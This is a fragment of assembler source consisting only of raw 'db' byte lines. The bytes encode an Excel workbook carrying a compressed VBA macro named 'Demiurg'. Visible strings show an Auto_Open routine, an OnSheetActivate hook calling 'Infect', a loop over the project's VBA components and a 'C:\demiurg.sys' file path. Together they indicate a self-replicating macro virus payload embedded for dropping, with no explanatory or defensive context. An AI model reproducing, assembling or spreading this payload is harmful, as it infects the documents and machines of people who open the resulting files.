db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 074h, 000h
db 020h, 000h, 01Dh, 000h, 000h, 000h, 024h, 000h
db 000h, 000h, 0E6h, 004h, 0FFh, 048h, 0E6h, 005h
db 000h, 0FFh, 0FFh, 000h, 000h, 001h, 0E6h, 007h
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 004h, 000h, 0E6h
db 010h, 0FFh, 0E6h, 004h, 000h, 0E6h, 010h, 0FFh
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 0E6h, 004h
db 000h, 0E6h, 01Eh, 0FFh, 04Dh, 045h, 000h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 000h, 000h
db 0E6h, 004h, 0FFh, 001h, 001h, 008h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
db 001h, 0A7h, 0B0h, 000h, 041h, 074h, 074h, 072h
db 069h, 062h, 075h, 074h, 000h, 065h, 020h, 056h
db 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h, 020h
db 03Dh, 020h, 022h, 044h, 069h, 065h, 000h, 073h
db 065h, 041h, 072h, 062h, 065h, 069h, 074h, 000h
db 073h, 06Dh, 061h, 070h, 070h, 065h, 022h, 00Dh
db 022h, 00Ah, 00Ah, 0A0h, 042h, 061h, 073h, 002h
db 0A0h, 030h, 07Bh, 000h, 030h, 030h, 030h, 032h
db 030h, 038h, 031h, 039h, 0EAh, 02Dh, 000h, 010h
db 030h, 003h, 008h, 043h, 000h, 014h, 002h, 012h
db 001h, 024h, 020h, 030h, 030h, 034h, 036h, 07Dh
db 00Dh, 07Ch, 043h, 072h, 040h, 065h, 061h, 074h
db 061h, 062h, 06Ch, 001h, 086h, 046h, 010h, 061h
db 06Ch, 073h, 065h, 00Ch, 05Eh, 050h, 072h, 065h
db 020h, 064h, 065h, 063h, 06Ch, 061h, 000h, 006h
db 049h, 064h, 011h, 000h, 090h, 054h, 072h, 075h
db 00Dh, 022h, 045h, 078h, 070h, 008h, 06Fh, 073h
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 000h
db 06Ch, 061h, 074h, 065h, 044h, 065h, 072h, 069h
db 006h, 076h, 002h, 024h, 011h, 065h, 043h, 075h
db 073h, 074h, 06Fh, 018h, 06Dh, 069h, 07Ah, 004h
db 044h, 003h, 032h, 0E6h, 036h, 000h, 001h, 016h
db 001h, 000h, 000h, 0B6h, 000h, 0FFh, 0FFh, 001h
db 001h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 034h, 000h
db 010h, 000h, 000h, 000h, 003h, 000h, 000h, 000h
db 005h, 000h, 000h, 000h, 007h, 000h, 000h, 000h
db 0E6h, 008h, 0FFh, 001h, 001h, 008h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
db 0DEh, 000h, 000h, 000h, 0AFh, 002h, 000h, 000h
db 0F5h, 001h, 000h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 001h, 000h, 000h, 000h, 0B5h, 031h
db 0B9h, 031h, 000h, 000h, 0FFh, 0FFh, 023h, 000h
db 000h, 000h, 088h, 000h, 000h, 000h, 008h, 0E6h
db 020h, 000h, 0FFh, 0FFh, 000h, 000h, 0CBh, 002h
db 000h, 000h, 0D6h, 000h, 000h, 000h, 0D6h, 000h
db 000h, 000h, 01Fh, 003h, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 0DFh, 000h, 0FFh
db 0FFh, 0E6h, 004h, 000h, 00Ch, 000h, 0E6h, 080h
db 0FFh, 028h, 000h, 000h, 000h, 002h, 000h, 053h
db 04Ch, 0E6h, 004h, 0FFh, 000h, 000h, 001h, 000h
db 053h, 010h, 0E6h, 004h, 0FFh, 000h, 000h, 001h
db 000h, 053h, 094h, 0E6h, 004h, 0FFh, 0E6h, 004h
db 000h, 002h, 03Ch, 0E6h, 004h, 0FFh, 000h, 000h
db 0FFh, 0FFh, 001h, 001h, 0E6h, 004h, 000h, 001h
db 000h, 04Eh, 000h, 030h, 000h, 07Bh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 032h, 000h, 030h
db 000h, 038h, 000h, 032h, 000h, 030h, 000h, 02Dh
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 02Dh, 000h, 043h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 034h, 000h, 036h, 000h, 07Dh
db 0E6h, 007h, 000h, 0DFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 001h, 001h, 038h, 000h, 000h, 000h
db 002h, 081h, 0FEh, 0E6h, 009h, 0FFh, 028h, 0E6h
db 005h, 000h, 0FFh, 0FFh, 0E6h, 008h, 000h, 0E6h
db 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h, 000h
db 000h, 024h, 000h, 000h, 000h, 0E6h, 004h, 0FFh
db 048h, 0E6h, 005h, 000h, 0FFh, 0FFh, 000h, 000h
db 001h, 0E6h, 007h, 000h, 0E6h, 00Ch, 0FFh, 0E6h
db 004h, 000h, 0E6h, 010h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 010h, 0FFh, 0E6h, 008h, 000h, 0E6h, 008h
db 0FFh, 0E6h, 004h, 000h, 0E6h, 01Eh, 0FFh, 04Dh
db 045h, 000h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h
db 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 001h, 001h, 0E6h, 040h, 000h, 0FEh, 0CAh, 001h
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
db 008h, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 078h
db 000h, 000h, 000h, 001h, 09Ch, 0B0h, 000h, 041h
db 074h, 074h, 072h, 069h, 062h, 075h, 074h, 000h
db 065h, 020h, 056h, 042h, 05Fh, 04Eh, 061h, 06Dh
db 000h, 065h, 020h, 03Dh, 020h, 022h, 054h, 061h
db 062h, 000h, 065h, 06Ch, 06Ch, 065h, 031h, 022h
db 00Dh, 00Ah, 011h, 00Ah, 0F8h, 042h, 061h, 073h
db 002h, 07Ch, 030h, 07Bh, 030h, 000h, 030h, 030h
db 032h, 030h, 038h, 032h, 030h, 02Dh, 03Bh, 000h
db 020h, 004h, 008h, 043h, 000h, 014h, 002h, 01Ch
db 001h, 024h, 030h, 030h, 008h, 034h, 036h, 07Dh
db 00Dh, 07Ch, 043h, 072h, 065h, 061h, 010h, 074h
db 061h, 062h, 06Ch, 001h, 086h, 046h, 061h, 06Ch
db 004h, 073h, 065h, 00Ch, 0BCh, 050h, 072h, 065h
db 064h, 065h, 048h, 063h, 06Ch, 061h, 000h, 006h
db 049h, 064h, 000h, 087h, 054h, 004h, 072h, 075h
db 00Dh, 022h, 045h, 078h, 070h, 06Fh, 073h, 002h
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 06Ch
db 061h, 080h, 074h, 065h, 044h, 065h, 072h, 069h
db 076h, 002h, 024h, 001h, 011h, 065h, 043h, 075h
db 073h, 074h, 06Fh, 06Dh, 069h, 006h, 07Ah, 004h
db 088h, 003h, 032h, 000h, 001h, 016h, 001h, 000h
db 001h, 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h
db 000h, 000h, 003h, 000h, 000h, 000h, 005h, 000h
db 000h, 000h, 007h, 000h, 000h, 000h, 0E6h, 008h
db 0FFh, 001h, 001h, 008h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h
db 000h, 000h, 037h, 003h, 000h, 000h, 0A5h, 001h
db 000h, 000h, 0E6h, 004h, 0FFh, 002h, 000h, 000h
db 000h, 001h, 000h, 000h, 000h, 0B5h, 031h, 0BBh
db 031h, 000h, 000h, 0FFh, 0FFh, 003h, 0E6h, 007h
db 000h, 002h, 0E6h, 020h, 000h, 0FFh, 0FFh, 000h
db 000h, 053h, 003h, 000h, 000h, 0D6h, 000h, 000h
db 000h, 0D6h, 000h, 000h, 000h, 0B7h, 005h, 0E6h
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
db 0DFh, 000h, 0FFh, 0FFh, 0E6h, 006h, 000h, 0E6h
db 080h, 0FFh, 028h, 0E6h, 005h, 000h, 002h, 03Ch
db 00Ch, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 002h
db 03Ch, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 002h
db 03Ch, 004h, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h
db 002h, 03Ch, 008h, 000h, 0FFh, 0FFh, 000h, 000h
db 0FFh, 0FFh, 001h, 001h, 0E6h, 006h, 000h, 0E8h
db 005h, 0C0h, 038h, 003h, 000h, 0DFh, 0E6h, 004h
db 000h, 050h, 000h, 000h, 000h, 001h, 001h, 010h
db 001h, 000h, 000h, 00Bh, 012h, 01Eh, 002h, 080h
db 0E6h, 006h, 000h, 060h, 0E6h, 004h, 000h, 0E6h
db 008h, 0FFh, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh, 000h, 000h
db 003h, 000h, 003h, 000h, 000h, 000h, 084h, 000h
db 000h, 001h, 0E6h, 006h, 000h, 080h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0C0h, 000h, 000h, 000h, 028h, 0E6h
db 007h, 000h, 0E6h, 004h, 0FFh, 068h, 0FFh, 040h
db 000h, 0E6h, 00Ah, 0FFh, 001h, 000h, 003h, 000h
db 003h, 000h, 003h, 000h, 084h, 000h, 000h, 001h
db 0E6h, 006h, 000h, 00Bh, 012h, 02Ah, 002h, 0E6h
db 004h, 0FFh, 002h, 000h, 000h, 060h, 0E6h, 004h
db 000h, 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh
db 002h, 000h, 00Dh, 000h, 00Dh, 000h, 006h, 000h
db 084h, 000h, 000h, 001h, 000h, 000h, 004h, 000h
db 0E6h, 006h, 0FFh, 010h, 000h, 000h, 000h, 040h
db 0E6h, 007h, 000h, 080h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 002h, 083h, 01Ch, 002h, 0E6h, 004h
db 0FFh, 008h, 000h, 0FFh, 0FFh, 000h, 001h, 0E6h
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h
db 000h, 000h, 024h, 000h, 000h, 000h, 0E6h, 004h
db 0FFh, 0F0h, 000h, 000h, 000h, 002h, 000h, 002h
db 0E6h, 00Fh, 000h, 0E6h, 010h, 0FFh, 080h, 000h
db 000h, 000h, 0E6h, 018h, 0FFh, 0D8h, 0E6h, 00Bh
db 000h, 008h, 000h, 004h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 004h, 000h, 0E6h, 018h, 0FFh, 004h, 000h
db 040h, 000h, 000h, 000h, 04Dh, 045h, 000h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 010h, 000h
db 022h, 081h, 008h, 000h, 006h, 000h, 00Ch, 0E6h
db 006h, 000h, 081h, 008h, 004h, 012h, 000h, 000h
db 000h, 008h, 000h, 000h, 000h, 004h, 081h, 008h
db 000h, 002h, 000h, 000h, 000h, 020h, 000h, 000h
db 000h, 022h, 081h, 008h, 000h, 006h, 000h, 00Ch
db 000h, 040h, 0E6h, 004h, 000h, 081h, 008h, 004h
db 00Ah, 000h, 000h, 000h, 048h, 0E6h, 004h, 000h
db 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh
db 000h, 081h, 008h, 004h, 026h, 000h, 000h, 000h
db 058h, 0E6h, 004h, 000h, 081h, 008h, 004h, 02Eh
db 000h, 000h, 000h, 080h, 0E6h, 004h, 000h, 080h
db 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh, 000h
db 081h, 008h, 008h, 01Eh, 000h, 000h, 000h, 0B0h
db 0E6h, 004h, 000h, 081h, 008h, 00Ch, 02Ch, 000h
db 000h, 000h, 0D0h, 0E6h, 004h, 000h, 081h, 008h
db 008h, 00Ah, 0E6h, 004h, 000h, 001h, 000h, 000h
db 000h, 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h
db 0FFh, 000h, 081h, 008h, 004h, 026h, 000h, 000h
db 000h, 010h, 001h, 000h, 000h, 000h, 081h, 008h
db 004h, 00Ah, 000h, 000h, 000h, 038h, 001h, 000h
db 000h, 004h, 081h, 008h, 000h, 002h, 000h, 000h
db 000h, 048h, 001h, 000h, 000h, 0E6h, 004h, 0FFh
db 001h, 001h, 058h, 001h, 000h, 000h, 08Fh, 004h
db 0E6h, 006h, 000h, 0AEh, 000h, 006h, 000h, 049h
db 06Eh, 066h, 065h, 063h, 074h, 020h, 000h, 020h
db 002h, 028h, 000h, 022h, 002h, 0E6h, 006h, 0FFh
db 06Ch, 000h, 0FFh, 0FFh, 058h, 000h, 000h, 000h
db 0AFh, 000h, 020h, 000h, 026h, 002h, 028h, 000h
db 028h, 002h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
db 06Ch, 000h, 0FFh, 0FFh, 038h, 000h, 000h, 000h
db 08Fh, 004h, 080h, 0E6h, 005h, 000h, 0AFh, 000h
db 020h, 000h, 020h, 002h, 028h, 000h, 02Ch, 002h
db 0E6h, 006h, 0FFh, 020h, 000h, 032h, 002h, 021h
db 000h, 008h, 001h, 020h, 000h, 032h, 002h, 021h
db 000h, 008h, 001h, 01Bh, 000h, 0A4h, 000h, 001h
db 000h, 024h, 020h, 0FCh, 000h, 003h, 000h, 024h
db 000h, 030h, 002h, 001h, 000h, 027h, 000h, 02Eh
db 002h, 000h, 000h, 0AEh, 000h, 001h, 000h, 031h
db 000h, 024h, 000h, 030h, 002h, 001h, 000h, 020h
db 000h, 02Eh, 002h, 007h, 000h, 020h, 000h, 02Eh
db 002h, 0AEh, 000h, 001h, 000h, 039h, 000h, 024h
db 000h, 030h, 002h, 001h, 000h, 007h, 000h, 004h
db 000h, 094h, 000h, 046h, 000h, 075h, 000h, 067h
db 000h, 000h, 0F0h, 0F7h, 000h, 020h, 000h, 034h
db 002h, 0F6h, 000h, 0A4h, 000h, 001h, 000h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
db 000h, 038h, 002h, 021h, 000h, 03Ah, 002h, 08Bh
db 000h, 000h, 000h, 020h, 000h, 034h, 002h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 025h
db 000h, 038h, 002h, 001h, 000h, 021h, 000h, 008h
db 001h, 0AEh, 000h, 007h, 000h, 044h, 065h, 06Dh
db 069h, 075h, 072h, 067h, 000h, 005h, 000h, 094h
db 000h, 046h, 000h, 075h, 000h, 067h, 000h, 0F8h
db 000h, 000h, 000h, 0F7h, 000h, 020h, 000h, 034h
db 002h, 0F6h, 000h, 0C0h, 000h, 000h, 0A0h, 048h
db 037h, 044h, 000h, 0AEh, 000h, 00Eh, 000h, 043h
db 03Ah, 05Ch, 064h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 02Eh, 073h, 079h, 073h, 01Dh, 000h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
db 000h, 038h, 002h, 042h, 040h, 03Ch, 002h, 001h
db 000h, 000h, 000h, 020h, 000h, 032h, 002h, 042h
db 040h, 03Eh, 002h, 0E6h, 004h, 000h, 021h, 000h
db 000h, 0A0h, 06Ch, 000h, 0FFh, 0FFh, 0A8h, 000h
db 000h, 000h, 0E6h, 004h, 0FFh, 0A8h, 000h, 000h
db 000h, 001h, 064h, 0B1h, 000h, 041h, 074h, 074h
db 072h, 069h, 062h, 075h, 074h, 000h, 065h, 020h
db 056h, 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h
db 020h, 03Dh, 020h, 022h, 044h, 065h, 06Dh, 000h
db 069h, 075h, 072h, 067h, 022h, 00Dh, 00Ah, 053h
db 000h, 075h, 062h, 020h, 041h, 075h, 074h, 06Fh
db 05Fh, 000h, 04Fh, 070h, 065h, 06Eh, 028h, 029h
db 00Dh, 00Ah, 002h, 020h, 000h, 000h, 041h, 070h
db 070h, 06Ch, 069h, 063h, 000h, 061h, 074h, 069h
db 06Fh, 06Eh, 02Eh, 04Fh, 06Eh, 000h, 053h, 068h
db 065h, 065h, 074h, 041h, 063h, 074h, 018h, 069h
db 076h, 061h, 000h, 08Ah, 000h, 07Ah, 049h, 06Eh
db 066h, 008h, 065h, 063h, 074h, 000h, 078h, 045h
db 06Eh, 064h, 020h, 00Fh, 000h, 080h, 003h, 08Ah
db 003h, 02Ah, 011h, 084h, 044h, 069h, 073h, 070h
db 000h, 06Ch, 061h, 079h, 041h, 06Ch, 065h, 072h
db 074h, 002h, 073h, 000h, 07Eh, 046h, 061h, 06Ch
db 073h, 065h, 00Dh, 002h, 00Ah, 003h, 06Bh, 06Ch
db 061h, 073h, 074h, 063h, 068h, 004h, 061h, 072h
db 000h, 017h, 041h, 073h, 063h, 028h, 04Dh, 010h
db 069h, 064h, 024h, 028h, 002h, 06Ch, 065h, 057h
db 06Fh, 080h, 072h, 06Bh, 062h, 06Fh, 06Fh, 06Bh
db 02Eh, 001h, 0B5h, 018h, 02Ch, 020h, 04Ch, 000h
db 09Fh, 010h, 018h, 029h, 02Ch, 020h, 044h, 031h
db 029h, 004h, 0B7h, 049h, 066h, 020h, 001h, 043h
db 022h, 080h, 031h, 022h, 029h, 020h, 03Ch, 03Dh
db 020h, 006h, 05Ah, 05Eh, 041h, 080h, 053h, 006h
db 006h, 000h, 00Ch, 002h, 012h, 039h, 000h, 012h
db 054h, 000h, 068h, 065h, 06Eh, 020h, 045h, 078h
db 069h, 074h, 007h, 003h, 063h, 083h, 048h, 081h
db 080h, 046h, 06Fh, 072h, 020h, 069h, 041h, 000h
db 049h, 031h, 020h, 054h, 06Fh, 020h, 08Ch, 03Ah
db 056h, 020h, 042h, 050h, 072h, 06Fh, 06Ah, 080h
db 080h, 02Eh, 056h, 000h, 042h, 043h, 06Fh, 06Dh
db 070h, 06Fh, 06Eh, 065h, 000h, 06Eh, 074h, 073h
db 02Eh, 063h, 06Fh, 075h, 06Eh, 07Eh, 074h, 087h
db 020h, 081h, 022h, 081h, 047h, 081h, 09Bh, 007h
db 065h, 093h, 01Dh, 028h, 0DCh, 069h, 029h, 002h
db 072h, 000h, 038h, 006h, 0CDh, 020h, 08Ch, 04Dh
db 081h, 027h, 081h, 081h, 001h, 04Eh, 065h, 078h
db 074h, 020h, 069h, 085h, 09Eh, 005h, 023h, 04Dh
db 049h, 000h, 029h, 072h, 074h, 020h, 028h, 022h
db 010h, 043h, 03Ah, 05Ch, 064h, 083h, 07Eh, 02Eh
db 073h, 079h, 08Ch, 073h, 022h, 085h, 07Bh, 0CBh
db 028h, 053h, 061h, 076h, 040h, 067h, 001h, 0C6h
db 076h, 0E6h, 021h, 000h, 0CCh, 061h, 05Eh, 000h
db 000h, 001h, 000h, 0FFh, 007h, 00Ch, 000h, 000h
db 009h, 004h, 000h, 000h, 0E4h, 004h, 001h, 0E6h
db 009h, 000h, 001h, 000h, 005h, 000h, 002h, 000h
db 01Ah, 001h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
db 07Bh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 032h, 000h, 030h, 000h, 034h, 000h, 045h, 000h
db 046h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 043h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 034h, 000h
db 036h, 000h, 07Dh, 000h, 023h, 000h, 033h, 000h
db 02Eh, 000h, 030h, 000h, 023h, 000h, 039h, 000h
db 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch, 000h
db 050h, 000h, 052h, 000h, 04Fh, 000h, 047h, 000h
db 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh, 000h
db 045h, 000h, 05Ch, 000h, 047h, 000h, 045h, 000h
db 04Dh, 000h, 045h, 000h, 049h, 000h, 04Eh, 000h
db 053h, 000h, 041h, 000h, 04Dh, 000h, 045h, 000h
db 020h, 000h, 044h, 000h, 041h, 000h, 054h, 000h
db 045h, 000h, 049h, 000h, 045h, 000h, 04Eh, 000h
db 05Ch, 000h, 04Dh, 000h, 049h, 000h, 043h, 000h
db 052h, 000h, 04Fh, 000h, 053h, 000h, 04Fh, 000h
db 046h, 000h, 054h, 000h, 020h, 000h, 053h, 000h
db 048h, 000h, 041h, 000h, 052h, 000h, 045h, 000h
db 044h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
db 041h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
db 041h, 000h, 033h, 000h, 033h, 000h, 032h, 000h
db 02Eh, 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h
db 023h, 000h, 056h, 000h, 069h, 000h, 073h, 000h
db 075h, 000h, 061h, 000h, 06Ch, 000h, 020h, 000h
db 042h, 000h, 061h, 000h, 073h, 000h, 069h, 000h
db 063h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 020h, 000h, 041h, 000h, 070h, 000h
db 070h, 000h, 06Ch, 000h, 069h, 000h, 063h, 000h
db 061h, 000h, 074h, 000h, 069h, 000h, 06Fh, 000h
db 06Eh, 000h, 073h, 0E6h, 00Dh, 000h, 004h, 001h
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
db 030h, 000h, 038h, 000h, 031h, 000h, 033h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
db 07Dh, 000h, 023h, 000h, 031h, 000h, 02Eh, 000h
db 032h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 050h, 000h
db 072h, 000h, 06Fh, 000h, 067h, 000h, 072h, 000h
db 061h, 000h, 06Dh, 000h, 06Dh, 000h, 065h, 000h
db 05Ch, 000h, 04Dh, 000h, 069h, 000h, 063h, 000h
db 072h, 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h
db 066h, 000h, 074h, 000h, 020h, 000h, 04Fh, 000h
db 066h, 000h, 066h, 000h, 069h, 000h, 063h, 000h
db 065h, 000h, 05Ch, 000h, 04Fh, 000h, 066h, 000h
db 066h, 000h, 069h, 000h, 063h, 000h, 065h, 000h
db 05Ch, 000h, 045h, 000h, 058h, 000h, 043h, 000h
db 045h, 000h, 04Ch, 000h, 038h, 000h, 02Eh, 000h
db 04Fh, 000h, 04Ch, 000h, 042h, 000h, 023h, 000h
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
db 074h, 000h, 020h, 000h, 045h, 000h, 078h, 000h
db 063h, 000h, 065h, 000h, 06Ch, 000h, 020h, 000h
db 038h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
db 072h, 000h, 079h, 0E6h, 00Dh, 000h, 0B8h, 000h
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
db 030h, 000h, 034h, 000h, 033h, 000h, 030h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
db 07Dh, 000h, 023h, 000h, 032h, 000h, 02Eh, 000h
db 030h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 057h, 000h
db 049h, 000h, 04Eh, 000h, 044h, 000h, 04Fh, 000h
db 057h, 000h, 053h, 000h, 05Ch, 000h, 053h, 000h
db 059h, 000h, 053h, 000h, 054h, 000h, 045h, 000h
db 04Dh, 000h, 05Ch, 000h, 053h, 000h, 054h, 000h
db 044h, 000h, 04Fh, 000h, 04Ch, 000h, 045h, 000h
db 032h, 000h, 02Eh, 000h, 054h, 000h, 04Ch, 000h
db 042h, 000h, 023h, 000h, 04Fh, 000h, 04Ch, 000h
db 045h, 000h, 020h, 000h, 041h, 000h, 075h, 000h
db 074h, 000h, 06Fh, 000h, 06Dh, 000h, 061h, 000h
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
db 00Dh, 000h, 0E0h, 000h, 02Ah, 000h, 05Ch, 000h
db 047h, 000h, 07Bh, 000h, 036h, 000h, 032h, 000h
db 041h, 000h, 033h, 000h, 032h, 000h, 043h, 000h
db 036h, 000h, 032h, 000h, 02Dh, 000h, 041h, 000h
db 033h, 000h, 036h, 000h, 044h, 000h, 02Dh, 000h
db 031h, 000h, 031h, 000h, 044h, 000h, 033h, 000h
db 02Dh, 000h, 041h, 000h, 035h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 041h, 000h, 036h, 000h
db 046h, 000h, 033h, 000h, 044h, 000h, 044h, 000h
db 041h, 000h, 044h, 000h, 038h, 000h, 032h, 000h
db 033h, 000h, 039h, 000h, 07Dh, 000h, 023h, 000h
db 032h, 000h, 02Eh, 000h, 030h, 000h, 023h, 000h
db 030h, 000h, 023h, 000h, 043h, 000h, 03Ah, 000h
db 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh, 000h
db 044h, 000h, 04Fh, 000h, 057h, 000h, 053h, 000h
db 05Ch, 000h, 053h, 000h, 059h, 000h, 053h, 000h
db 054h, 000h, 045h, 000h, 04Dh, 000h, 05Ch, 000h
db 04Dh, 000h, 053h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 06Dh, 000h, 073h, 000h, 02Eh, 000h
db 054h, 000h, 057h, 000h, 044h, 000h, 023h, 000h
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
db 074h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 06Dh, 000h, 073h, 000h, 020h, 000h
db 032h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
db 072h, 000h, 079h, 0E6h, 00Bh, 000h, 001h, 000h
db 0E4h, 000h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
db 07Bh, 000h, 036h, 000h, 032h, 000h, 041h, 000h
db 033h, 000h, 032h, 000h, 043h, 000h, 036h, 000h
db 033h, 000h, 02Dh, 000h, 041h, 000h, 033h, 000h
db 036h, 000h, 044h, 000h, 02Dh, 000h, 031h, 000h
db 031h, 000h, 044h, 000h, 033h, 000h, 02Dh, 000h
db 081h, 000h, 000h, 000h, 082h, 000h, 000h, 000h
db 083h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
db 085h, 000h, 000h, 000h, 086h, 000h, 000h, 000h
db 087h, 000h, 000h, 000h, 088h, 000h, 000h, 000h
db 089h, 000h, 000h, 000h, 08Ah, 000h, 000h, 000h
db 08Bh, 000h, 000h, 000h, 08Ch, 000h, 000h, 000h
db 08Dh, 000h, 000h, 000h, 08Eh, 000h, 000h, 000h
db 08Fh, 000h, 000h, 000h, 090h, 000h, 000h, 000h
db 091h, 000h, 000h, 000h, 092h, 000h, 000h, 000h
